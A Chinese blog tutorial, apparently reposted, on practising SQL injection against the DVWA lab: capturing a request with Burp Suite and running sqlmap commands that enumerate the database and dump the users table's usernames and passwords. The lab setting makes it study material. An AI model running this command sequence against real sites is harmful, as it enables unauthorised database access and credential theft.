使用burpsuite抓包 + sql工具注入 dvwa初级靶场

您所在的位置:网站首页 buuctf web dvwa 使用burpsuite抓包 + sql工具注入 dvwa初级靶场

使用burpsuite抓包 + sql工具注入 dvwa初级靶场

2023-02-16 19:12| 来源: 网络整理| 查看: 265

使用burpsuite抓包 + sql工具注入 dvwa靶场

记录一下自己重新开始学习web安全之路②。

一、准备工作 1.工具准备 sqlmap + burpsuite 2.浏览器准备 火狐浏览器 + 设置代理。

首先,先设置一下火狐浏览器的代理

1

http代理地址为127.0.0.0.1 ,端口为8080

3.burpsuite 准备 将burpsuite的抓包功能打开。

注:burpsuite 不抓127.0.0.1 /dvwa-master的包,所以需要用本地网卡 ip/dvwa-master 访问

怎么查到本地网卡ip?

在cmd中输入ipconfig

2

得到本地网卡ip 192.168.92.1

如果是无线网,那么找无线网适配器的IPV4地址

3

通过本地网卡ip进入dvwa,把安全等级改为low等级,,设置代理之后。

4

在搜索框输入之后,点击submit。

通过burpsuite抓包得到

5

注:抓到的包必须是注入点的包。

如: (GET /dvwa-master/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1)即有?id=1,2等

然后在burpsuite中 点击Action — Save item 保存到本地。

保存之后,利用sqlmap工具。首先要在cmd中先来到sqlmap的文件路径下。

目标:拿账号密码(数据) 1.查询数据库的名称 (dvwa)

python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” --current-db

6

7

-r // 指定读取本地文件

–current-db //列出当前网站数据库名称

2.查询数据表的名称 (guestbook 、users)

python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” -D dvwa --tables

8

9

-D //指定数据库名称

–tables //数据表

3.查询数据列的名称 (user 、password)

python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” -D dvwa -T users --columns

10

11

-T //指定数据表的名称

–columns //列出数据列的名称

4.读取数据 (user、password)

python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” -D dvwa -T users -C user,password --dump

12

13

-C //指定数据列的名称

–dump // 读取数据

拿账号密码时遇到的问题: 1.首先是burpsuite抓包时 火狐浏览器显示

14

通过百度得到解决办法:

15

2.sqlmap,更新问题,可以不用管,但是一开始看到有警告,去官网下了一个新的sqlmap即可。


【本文地址】


今日新闻


推荐新闻


CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3